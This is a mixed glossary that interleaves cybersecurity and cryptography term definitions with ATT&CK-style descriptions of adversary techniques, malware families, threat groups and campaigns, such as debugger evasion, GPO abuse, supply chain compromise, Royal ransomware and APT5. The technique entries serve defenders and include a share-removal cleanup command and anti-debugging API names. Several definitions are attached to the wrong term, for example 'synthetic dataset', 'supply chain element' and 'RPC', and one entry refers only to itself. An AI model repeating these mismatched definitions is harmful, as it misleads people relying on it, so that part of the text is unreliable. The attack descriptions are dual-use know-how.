Definition: Output keying material that is derived from the key-derivation key <i>K<sub>IN</sub></i> and other data that were used as input to a key-derivation function.

Term: multipath
Definition: The propagation phenomenon that results in signals reaching the receiving antenna by two or more paths. When two or more signals arrive simultaneously, wave interference results. The received signal fades if the wave interference is time varying or if one of the terminals is in motion.

Term: PNT source
Definition: A PNT system component that is used to produce a PNT solution. Examples include GNSS receivers, networked and local clocks, inertial navigation systems (INS), and timing services provided over a wired or wireless connection.

Term: APT
Definition: An adversary with sophisticated levels of expertise and significant resources, allowing it through the use of multiple different attack vectors (e.g., cyber, physical, and deception), to generate opportunities to achieve its objectives which are typically to establish and extend its presence within the information technology infrastructure of organizations for purposes of continually exfiltrating information and/or to undermine or impede critical aspects of a mission, program, or organization, or place itself in a position to do so in the future; moreover, the advanced persistent threat pursues its objectives repeatedly over an extended period of time, adapting to a defender’s efforts to resist it, and with determination to maintain the level of interaction needed to execute its objectives.

Term: cardholder
Definition: An individual possessing an issued PIV Card.

Name: Masquerade Task or Service
Type: attack-pattern
Description: Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.

Term: BGP Session
Definition: A TCP session in which both ends are operating BGP and have successfully processed an OPEN message from the other end.

Term: advanced persistent threat
Definition: An adversary with sophisticated levels of expertise and significant resources, allowing it through the use of multiple different attack vectors (e.g., cyber, physical, and deception), to generate opportunities to achieve its objectives which are typically to establish and extend its presence within the information technology infrastructure of organizations for purposes of continually exfiltrating information and/or to undermine or impede critical aspects of a mission, program, or organization, or place itself in a position to do so in the future; moreover, the advanced persistent threat pursues its objectives repeatedly over an extended period of time, adapting to a defender’s efforts to resist it, and with determination to maintain the level of interaction needed to execute its objectives.

Term: key establishment
Definition: The procedure that results in keying material that is shared between the participating parties in a key-establishment transaction.

Term: security architecture
Definition: A set of physical and logical security-relevant representations (i.e., views) of system architecture that conveys information about how the system is partitioned into security domains and makes use of security-relevant elements to enforce security policies within and between security domains based on how data and information must be protected.

Name: Supply Chain Compromise
Type: attack-pattern
Description: Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (removable media infected at the factory) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction

While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. Adversaries may limit targeting to a desired victim set or distribute malicious software to a broad set of consumers but only follow up with specific victims. Popular open-source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.

In some cases, adversaries may conduct “second-order” supply chain compromises by leveraging the access gained from an initial supply chain compromise to further compromise a software component. This may allow the threat actor to spread to even more victims.

Term: approved
Definition: FIPS approved or NIST recommended: an algorithm or technique that is either 1) specified in a FIPS or a NIST Recommendation, or 2) adopted in a FIPS or a NIST Recommendation.

Term: Digital Video Disc
Definition: A Digital Video Disc (DVD) has the same shape and size as a CD, but with a higher density that gives the option for data to be double-sided and/or double-layered.

Term: negative risk
Definition: Any circumstance or event with the potential to adversely impact organizational operations and assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, or modification of information, and/or denial of service.

Term: approval status
Definition: Used to designate usage by the U.S. Federal Government.

Term: pseudorandom number generator
Definition: An algorithm that produces a sequence of bits that are uniquely determined from an initial value called a seed. The output of the DRBG “appears” to be random, i.e., the output is statistically indistinguishable from random values. A cryptographic DRBG has the additional property that the output is unpredictable, given that the seed is not known. A DRBG is sometimes also called a Pseudo Random Number Generator (PRNG) or a deterministic random number generator.

Term: hybrid security control
Definition: A security control that is implemented in an information system in part as a common control and in part as a system-specific control.See Common Control and System-Specific Security Control.

Term: Capability, Manage and Assess Risk
Definition: The process of managing risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system, and includes: (i) the conduct of a risk assessment; (ii) the implementation of a risk mitigation strategy; and (iii) employment of techniques and procedures for the continuous monitoring of the security state of the information system.

Term: Biometrics
Definition: The science and technology of measuring and statistically analyzing biological data. In information technology, biometrics usually refers to automated technologies for authenticating and verifying human body characteristics such as fingerprints, eye retinas and irises, voice patterns, facial patterns, and hand measurements.

Term: Audience
Definition: The application or system that is meant to receive an assertion.

Term: Internal Control
Definition: An overarching mechanism that an enterprise uses to achieve and monitor enterprise objectives.

Term: Header
Definition: A portion of a packet that contains layer-specific information such as addresses.

Term: misdirection
Definition: The process of maintaining and employing deception resources or environments and directing adversary activities to those resources or environments.

Term: Extension Identifier
Definition: Any piece of identifying information provided in an asset identification element that is not explicitly defined in the Asset Identification schema.

Term: <strong>Shall</strong>
Definition: This term is used to indicate a requirement that needs to be fulfilled to claim conformance to this Recommendation. Note that shall may be coupled with not to become shall not.

Term: BIO
Definition: BGPsec Input-Output (BIO) enables the generation and storage of precomputed reproducible BGPsec traffic for testing purposes.

Term: <strong>Should</strong>
Definition: Term used to indicate a strong recommendation but not a requirement of this standard. Ignoring the recommendation could result in undesirable results.

Term: supply chain element
Definition: A statement about an ISCM concept that is true for a well-implemented ISCM program.

Term: impact value
Definition: The assessed potential impact resulting from a compromise of the confidentiality, integrity, or availability of information expressed as a value of low, moderate or high.

Term: CJD
Definition: A process that is responsible for receiving and securely wrapping the content filtered by the CDS and dispatching it for storage and remote transfer. This daemon is also used to send quarantined data (e.g., data that failed filtering) to an external system for analysis.

Term: Certificate Signing Request
Definition: A request sent from a certificate requester to a certificate authority to apply for a digital identity certificate. The certificate signing request contains the public key as well as other information to be included in the certificate and is signed by the private key corresponding to the public key.

Term: <em>In</em>
Definition: Block of data representing the Input Block n

Term: federal agency
Definition: The term 'agency' means any executive department, military department, government corporation, government controlled corporation, or other establishment in the executive branch of the government (including the Executive Office of the President), or any independent regulatory agency, but does not include ­
(a) the General Accounting Office;
(b) Federal Election Commission;
(c) the governments of the District of Columbia and of the territories and possessions of the United States, and their various subdivisions; or
(d) Government-owned contractor-operated facilities, including laboratories engaged in national defense research and production activities.

Term: RPC
Definition: An entity that relies upon the subscriber’s authenticator(s) and credentials or a verifier’s assertion of a claimant’s identity, typically to process a transaction or grant access to information or a system.

Term: authoritative attribute source
Definition: The official source that originates and maintains the attributes of entities.

Name: Steganography
Type: attack-pattern
Description: Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

Term: key pair
Definition: A public key and its corresponding private key.

Term: Target Profile
Definition: The desired outcome or ‘to be’ state of cybersecurity implementation.

Name: Cloud Service Hijacking
Type: attack-pattern
Description: Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. 

For example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / Phishing emails and SMS messages. Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.

In some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service. Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability.

Name: Mutual Exclusion
Type: attack-pattern
Description: Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.

While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes. By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.

In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.

Mutex names may be hard-coded or dynamically generated using a predictable algorithm.

Term: NSA-approved cryptography
Definition: Cryptography that consists of: (i) an approved algorithm; (ii) an implementation that has been approved for the protection of classified information and/or controlled unclassified information in a particular environment; and (iii) a supporting key management infrastructure.

Term: measurement
Definition: the process of data collection, analysis, and reporting

Term: Feature extraction function
Definition: identifies and extracts features/attributes from each digital artifact. The mechanism by which features are picked and interpreted depends on the approximate matching algorithm. The representation of this collection is the similarity digest of the object.

Term: learners
Definition: Individuals who perform cybersecurity work, including students, job seekers, and employees.

Term: synthetic dataset
Definition: The absolute error divided by the unaltered query output.

Term: Self-signed certificate
Definition: A public-key certificate whose digital signature may be verified by the public key contained within the certificate. The signature on a self-signed certificate protects the integrity of the information within the certificate but does not guarantee the authenticity of that information. The trust of self-signed certificates is based on the secure procedures used to distribute them.

Term: ICS
Definition: General term that encompasses several types of control systems, including supervisory control and data acquisition (SCADA) systems, distributed control systems (DCS), and other control system configurations such as programmable logic controllers (PLC) found in the industrial sectors and critical infrastructures. An industrial control system consists of combinations of control components (e.g., electrical, mechanical, hydraulic, pneumatic) that act together to achieve an industrial objective (e.g., manufacturing, transportation of matter or energy).

Term: Contingency Planning
Definition: The development of a contingency plan.

Term: significant cybersecurity or privacy responsibilities
Definition: The preferred terminology herein for identifying those whose roles in the organization necessitate ongoing role-based training. These individuals have work-related responsibilities beyond those of all users and will need to participate in both general and specialized learning program activities.

Term: information system-related security risks
Definition: The level of impact on organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring.

Term: Targeted security strength
Definition: The security strength that is intended to be supported by one or more implementation-related choices (such as algorithms, primitives, auxiliary functions, parameter sizes and/or actual parameters) for the purpose of instantiating a cryptographic mechanism.

Term: recovery and reconstitution
Definition: Reflect mission and business priorities, recovery point/time and reconstitution objectives, and established organizational metrics consistent with contingency plan requirements. Associated capabilities can include both automated mechanisms and manual procedures.

Term: media sanitization
Definition: The actions taken to render data written on media unrecoverable by both logical and state-of-the-art laboratory techniques.

Name: Shark
Type: malware
Description: Shark is a backdoor malware written in C# and .NET that is an updated version of Milan; it has been used by HEXANE since at least July 2021.

Name: Create Account
Type: attack-pattern
Description: Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

Term: Key inventory
Definition: Information about each key that does not include the key itself (e.g., the key owner, key type, algorithm, application and expiration date).

Term: CT&E
Definition: Software, hardware, and firmware security tests conducted during development of an information system component.

Term: focused testing
Definition: A test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object.

Term: Service-Oriented Architecture (SOA)
Definition: A collection of services. These services communicate with each other. The communication can involve either simple data passing or it could involve two or more services coordinating some activity.

Term: multi-factor authentication
Definition: Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN, password), something you have (e.g., cryptographic identification device, token), or something you are (e.g., biometric). See authenticator.

Term: IR
Definition: A specific section of standards, guidelines, and practices common among critical infrastructure sectors that illustrates a method to achieve the outcomes associated with each Subcategory. An example of an Informative Reference is ISO/IEC 27001 Control A.10.8.3, which supports the “Data-in-transit is protected” Subcategory of the “Data Security” Category in the “Protect” function.

Term: Pairwise Trust
Definition: Establishment of trust by two entities that have direct business agreements with each other.

Term: authenticate
Definition: Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in an information system.

Term: CVE Record Metadata
Definition: Information attached to the CVE by the NVD Analyst and/or CNA. Comprised of CVSS v3.1, CVSS v2, CWE, Reference Link Tags, and Configurations.

Name: Contagious Interview
Type: intrusion-set
Description: Contagious Interview is a North Korea–aligned threat group active since 2023. The group conducts both cyberespionage and financially motivated operations, including the theft of cryptocurrency and user credentials. Contagious Interview targets Windows, Linux, and macOS systems, with a particular focus on individuals engaged in software development and cryptocurrency-related activities.

Term: key-establishment key pair
Definition: A public key and its corresponding private key.

Name: APT5
Type: intrusion-set
Description: APT5 is a China-based espionage actor that has been active since at least 2007 primarily targeting the telecommunications, aerospace, and defense industries throughout the U.S., Europe, and Asia. APT5 has displayed advanced tradecraft and significant interest in compromising networking devices and their underlying software including through the use of zero-day exploits.

Term: HWAM
Definition: See Capability, Hardware Asset Management.

Term: module
Definition: The set of hardware, software, and/or firmware that implements approved security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic boundary.

Term: Support a security strength
Definition: A security strength of s bits is said to be supported by a particular choice of algorithm, primitive, auxiliary function, parameters (etc.) for use in the implementation of a cryptographic mechanism if that choice will not prevent the resulting implementation from attaining a security strength of at least s bits. In this Recommendation, it is assume that implementation choices are intended to support a security strenght of 112 bits or more (see [NIST SP 800-57] and [NIST SP 800-131A])

Name: InnaputRAT
Type: malware
Description: InnaputRAT is a remote access tool that can exfiltrate files from a victim’s machine. InnaputRAT has been seen out in the wild since 2016.

Term: model control
Definition: A capability with which an attacker can control the machine learning model parameters.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. The function is expected to have the following three properties:
1. Collision resistance (see Collision resistance),
2. Preimage resistance (see Preimage resistance) and
3. Second preimage resistance (see Second preimage resistance).
Approved hash functions are specified in [FIPS 180-4].

Term: traceability matrix
Definition: A matrix that records the relationship between two or more products of the development process (e.g., a matrix that records the relationship between the requirements and the design of a given software component).
Note 1: A traceability matrix can record the relationship between a set of requirements and one or more products of the development process and can be used to demonstrate completeness and coverage of an activity or analysis based upon the requirements contained in the matrix.
Note 2: A traceability matrix may be conveyed as a set of matrices representing requirements at different levels of decomposition. Such a traceability matrix enables the tracing of requirements stated in their most abstract form (e.g., statement of stakeholder requirements) through decomposition steps that result in the implementation that satisfies the requirements.

Term: Wireless Personal Area Network (WPAN)
Definition: A small-scale wireless network that requires little or no infrastructure and operates within a short range. A WPAN is typically used by a few devices in a single room instead of connecting the devices with cables.

Term: e-commerce
Definition: The use of network technology (especially the internet) to buy or sell goods and services.

Name: Covenant
Type: tool
Description: Covenant is a multi-platform command and control framework written in .NET. While designed for penetration testing and security research, the tool has also been used by threat actors such as HAFNIUM during operations. Covenant functions through a central listener managing multiple deployed "Grunts" that communicate back to the controller.

Term: Second preimage resistance
Definition: An expected property of a cryptographic hash function whereby it is computationally infeasible to find a second preimage of a known message digest, See “Second preimage”.

Term: question
Definition: The text of a question to pose, optionally accompanied by instructions to help guide a person to a response.

Term: Application Firewall
Definition: A firewall that uses stateful protocol analysis to analyze network traffic for one or more applications.

Term: Presentation Attack Detection (PAD)
Definition: Automated determination of a presentation attack. A subset of presentation attack determination methods, referred to as liveness detection, involve measurement and analysis of anatomical characteristics or involuntary or voluntary reactions, in order to determine if a biometric sample is being captured from a living subject present at the point of capture.

Term: electronic messaging services
Definition: Services providing interpersonal messaging capability; meeting specific functional, management, and technical requirements; and yielding a business- quality electronic mail service suitable for the conduct of official government business.

Term: zeroization
Definition: A method of sanitization that renders Target Data recovery infeasible using state of the art laboratory techniques and results in the subsequent inability to use the media for storage of data.

Term: Capstone Policies
Definition: Those policies that are developed by governing or coordinating institutions of HIEs. They provide overall requirements and guidance for protecting health information within those HIEs. Capstone Policies must address the requirements imposed by: (1) all laws, regulations, and guidelines at the federal, state, and local levels; (2) business needs; and (3) policies at the institutional and HIE levels.

Term: <em>L</em>
Definition: An integer specifying the length of the derived keying material <i>K<sub>OUT&nbsp;</sub></i>in bits, which is represented as a bit string when it is an input to a key-derivation function.

Term: Analysis
Definition: The third phase of the computer and network forensic process, which involves using legally justifiable methods and techniques, to derive useful information that addresses the questions that were the impetus for performing the collection and examination.

Term: spyware
Definition: Malware intended to violate a user’s privacy.

Name: PHOREAL
Type: malware
Description: PHOREAL is a signature backdoor used by APT32.

Term: clipping parameter
Definition: The specific choice of lower and upper bounds that are used when an algorithm performs clipping. The utility of a differentially private algorithm is often dependent on choosing good clipping parameters. One must be careful not to compute the clipping parameter directly from the data, as doing so may lead to a violation of privacy.

Term: Source content
Definition: Part or all of SCAP source data streams.

Name: Operation Digital Eye
Type: campaign
Description: Operation Digital Eye was conducted in June and July of 2024 by suspected People's Republic of China (PRC)-nexus threat actors targeting business-to-business IT service providers in Southern Europe. Operation Digital Eye activity included the use of Visual Studio Code tunnels for command and control (C2) and custom lateral movement capabilities. Overlaps in tooling between Digital Eye and previous China-nexus campaigns, Operation Soft Cell and Operation Tainted Love, indicate the potential use of shared vendors or digital quartermasters.

Term: Internet Key Exchange (IKE)
Definition: A protocol used to negotiate, create, and manage its own (IKE) and IPsec security associations.

Term: KAS2-Party_U-confirmation
Definition: Key-Agreement Scheme 2 with confirmation by party U. Previously known as KAS2-initiator-confirmation.

Term: FEA
Definition: A business-based framework for governmentwide improvement developed by the Office of Management and Budget that is intended to facilitate efforts to transform the federal government to one that is citizen-centered, results-oriented, and market-based.

Term: PKC
Definition: Cryptography that uses separate keys for encryption and decryption; also known as asymmetric cryptography.

Name: C0026
Type: campaign
Description: C0026 was a campaign identified in September 2022 that included the selective distribution of KOPILUWAK and QUIETCANARY malware to previous ANDROMEDA malware victims in Ukraine through re-registered ANDROMEDA C2 domains. Several tools and tactics used during C0026 were consistent with historic Turla operations.

Name: Rclone
Type: tool
Description: Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.

Term: CN
Definition: An attribute type that is commonly found within a Subject Distinguished Name in an X.500 directory information tree. When identifying machines, it is composed of a fully qualified domain name or IP address.

Term: SSH Key
Definition: A term that is generally used to refer to an identity and authorized keys. The term may also be occasionally used to refer to host or server private keys.

Term: authenticate
Definition: The corroboration that a person is the one claimed.

Term: Trust Framework
Definition: The “rules” underpinning federated identity management, typically consisting of: system, legal, conformance, and recognition.

Term: token
Definition: Something that the Claimant possesses and controls (typically a cryptographic module or password) that is used to authenticate the Claimant’s identity.

Term: issuer
Definition: An entity that performs functions required to produce, issue, and maintain PIV Cards or Derived PIV Credentials for an organization

Term: design principle
Definition: A distillation of experience designing, implementing, integrating, and upgrading systems that systems engineers and architects can use to guide design decisions and analysis. A design principle typically takes the form of a terse statement or a phrase identifying a key concept, accompanied by one or more statements that describe how that concept applies to system design (where “system” is construed broadly to include operational processes and procedures, and may also include development and maintenance environments).

Term: MUD-Capable
Definition: An Internet of Things (IoT) device that can emit a MUD uniform resource locator in compliance with the MUD specification.

Term: virtual-led
Definition: When instruction occurs in a virtual or simulated environment and is presented or facilitated by an instructor in real time.

Term: computer network operations (CNO)
Definition: Comprised of computer network attack, computer network defense, and related computer network exploitation enabling operations. 
Note: Within the Department of Defense (DoD), term was approved for deletion from JP 1-02 (DoD Dictionary). This term has been replaced by the use of " cyberspace operations" used in JP 3-12, "Cyberspace Operations." Original source of term was JP 1-02 (DoD Dictionary).

Term: Probable prime
Definition: An integer that is believed to be prime based on a probabilistic primality test. There should be no more than a negligible probability that the so-called probable prime is actually composite.

Name: Debugger Evasion
Type: attack-pattern
Description: Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to Virtualization/Sandbox Evasion, if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary. On Windows, this may involve Native API function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). On Linux, this may involve querying `/proc/self/status` for the `TracerPID` field, which indicates whether or not the process is being traced by dynamic analysis tools. Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).

Malware may also leverage Structured Exception Handling (SEH) to detect debuggers by throwing an exception and detecting whether the process is suspended. SEH handles both hardware and software expectations, providing control over the exceptions including support for debugging. If a debugger is present, the program’s control will be transferred to the debugger, and the execution of the code will be suspended. If the debugger is not present, control will be transferred to the SEH handler, which will automatically handle the exception and allow the program’s execution to continue.

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping Native API function calls such as <code>OutputDebugStringW()</code>.

Term: hidden Markov model
Definition: A Markov model in which the system being modeled is assumed to be a Markov process with unobservable states. The model provides an observ­able process whose outcomes are influenced by the outcomes of a Markov model in a known way. An HMM can be used to describe the evolution of observable events that depend on internal factors that are not directly observable. In ma­chine learning, it is assumed that the internal state of a model is hidden but not its hyperparameters.

Term: Service-Oriented Architecture (SOA)
Definition: A set of principles and methodologies for designing and developing software in the form of interoperable services. These services are well-defined business functions that are built as software components (i.e., discrete pieces of code and/or data structures) that can be reused for different purposes.

Name: Truvasys
Type: malware
Description: Truvasys is first-stage malware that has been used by PROMETHIUM. It is a collection of modules written in the Delphi programming language.

Name: SYNful Knock
Type: malware
Description: SYNful Knock is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.

Term: exclusive-OR
Definition: A XOR B is equivalent to A ⊕ B. See the definition of the bitwise logical operation ⊕ above.

Term: holdover
Definition: An operating condition of a clock which has lost its controlling reference input, is using its local oscillator, and can be augmented with stored data acquired while locked to the reference input or a frequency reference to control its output.

Name: Group Policy Modification
Type: attack-pattern
Description: Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`. 

Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.

Malicious GPO modifications can be used to implement many other malicious behaviors such as Scheduled Task/Job, Disable or Modify Tools, Ingress Tool Transfer, Create Account, Service Execution, and more. Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.

For example, publicly available scripts such as <code>New-GPOImmediateTask</code> can be leveraged to automate the creation of a malicious Scheduled Task/Job by modifying GPO settings, in this case modifying <code>&lt;GPO_PATH&gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml</code>. In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <code>&lt;GPO_PATH&gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf</code>, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.

Name: LitePower
Type: malware
Description: LitePower is a downloader and second stage malware that has been used by WIRTE since at least 2021.

Term: Identifying Information
Definition: The set of an asset's attributes that may be useful for identifying that asset, including discoverable information about the asset and identifiers assigned to the asset.

Term: authenticate
Definition: As used in this document, a process that provides assurance of the source and integrity of information that is communicated or stored, or that provides assurance of an entity’s identity.

Term: sensitive information
Definition: Sensitive but unclassified information.

Name: Network Share Connection Removal
Type: attack-pattern
Description: Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and SMB/Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command.

Name: Royal
Type: malware
Description: Royal is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. Royal employs partial encryption and multiple threads to evade detection and speed encryption. Royal has been used in attacks against multiple industries worldwide--including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in Royal and Conti attacks and noted a possible connection between their operators.

Term: Key-derivation key
Definition: A key used as an input to a key-derivation method to derive other keys. See SP 800-108.

Term: Managed Devices
Definition: Personal computers, laptops, mobile devices, virtual machines, and infrastructure components require management agents, allowing information technology staff to discover, maintain, and control these devices. Those with broken or missing agents cannot be seen or managed by agent-based security products.

Name: Exploitation for Privilege Escalation
Type: attack-pattern
Description: Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.

When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.

Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD). Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via Ingress Tool Transfer or Lateral Tool Transfer.

Term: Owner
Definition: For an asymmetric key pair consisting of a private key and a public key, the owner is the entity that is authorized to use the private key associated with the public key, whether that entity generated the key pair itself or a trusted party generated the key pair for the entity.

Term: JWT
Definition: A data exchange format made of a header, payload, and signature where the header and the payload take the form of JSON objects. They are encoded and concatenated with the aggregate being signed to generate a signature.

Name: Log Enumeration
Type: attack-pattern
Description: Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records (Account Discovery), security or vulnerable software (Software Discovery), or hosts within a compromised network (Remote System Discovery).

Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or PowerShell on Windows to access and/or export security event information. In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.

Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.

In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.

Term: packet sniffer and passive wiretapping
Definition: See packet sniffer and passive wiretapping.

Term: Estimated maximum security strength
Definition: An estimate of the largest security strength that can be attained by a cryptographic mechanism given the explicit and implicit assumptions that are made regarding its implementation and supporting infrastructure (e.g., the algorithms employed, the selection of associated primitives and/or auxiliary functions, the choices for various parameters, the methods of generation and/or protection for any required keys, etc.). The estimated maximum security strengths of various approved cryptographic mechanisms are provided in [SP 800-57].

Name: InvisiMole
Type: malware
Description: InvisiMole is a modular spyware program that has been used by the InvisiMole Group since at least 2013. InvisiMole has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. Gamaredon Group infrastructure has been used to download and execute InvisiMole against a small number of victims.

Term: key management
Definition: The activities involving the handling of cryptographic keys and other related key information during the entire lifecycle of the keys, including their generation, storage, establishment, entry and output, use, and destruction.

Term: SAOP
Definition: The senior official, designated by the head of each agency, who has agency-wide responsibility for privacy, including implementation of privacy protections; compliance with Federal laws, regulations, and policies relating to privacy; management of privacy risks at the agency; and a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Term: Derived Relationship Mapping
Definition: A potential mapping between Reference Document Elements identified by finding elements from two or more Reference Documents that map to the same Focal Document Element.

Term: Key generation
Definition: The generation of a cryptographic key either as a single process using a random bit generator and an approved set of rules, or as created during key agreement or key derivation.

Term: risk analysis
Definition: The process of identifying the risks to system security and determining the probability of occurrence, the resulting impact, and the additional safeguards that mitigate this impact. Part of risk management and synonymous with risk assessment.

Term: CKMS developer
Definition: The entity that assembles a CKMS as designed by the CKMS designer.

Term: Cloned Tag
Definition: A tag that is made to be a duplicate of a legitimate tag. A cloned tag can be created by reading data such as an identifier from a legitimate tag and writing that data to a different tag.

Term: Cryptographic key component
Definition: One of at least two parameters that have the same format as a cryptographic key; parameters are combined in an Approved security function to form a plaintext cryptographic key before use.

Term: security authorization (to operate)
Definition: Official management decision given by a senior Federal official or officials to authorize operation of an information system and to explicitly accept the risk to agency operations (including mission, functions, image, or reputation), agency assets, individuals, other organizations, and the Nation based on the implementation of an agreed-upon set of security and privacy controls. Authorization also applies to common controls inherited by agency information systems. Note 1: The system is authorized to operate for a specified period in accordance with terms and conditions established by the authorizing official. Note 2: Formerly known as "approval to operate." Term was replaced in the risk management framework in 2010.

Term: Capability, Vulnerability Management
Definition: See Capability, Vulnerability Management.

Term: specification
Definition: A document that specifies, in a complete, precise, verifiable manner, the requirements, design, behavior, or other characteristics of a system or component and often the procedures for determining whether these provisions have been satisfied.
Refer to security specification.

Term: Hypothesis (Alternative)
Definition: A statement Ha that an analyst will consider as true (e.g., Ha: the sequence is non-random) if and when the null hypothesis is determined to be false.

Name: NEODYMIUM
Type: intrusion-set
Description: NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called PROMETHIUM due to overlapping victim and campaign characteristics. NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.

Term: party
Definition: Either a subject (an active element that operates on information or the system state) or an object (a passive element that contains or receives information).

Term: DEA
Definition: The algorithm specified in FIPS PUB 46-3, Data Encryption Algorithm (DEA).

Term: process
Definition: Set of interrelated or interacting activities which transforms inputs into outputs.
A program in execution.

Name: Rename Legitimate Utilities
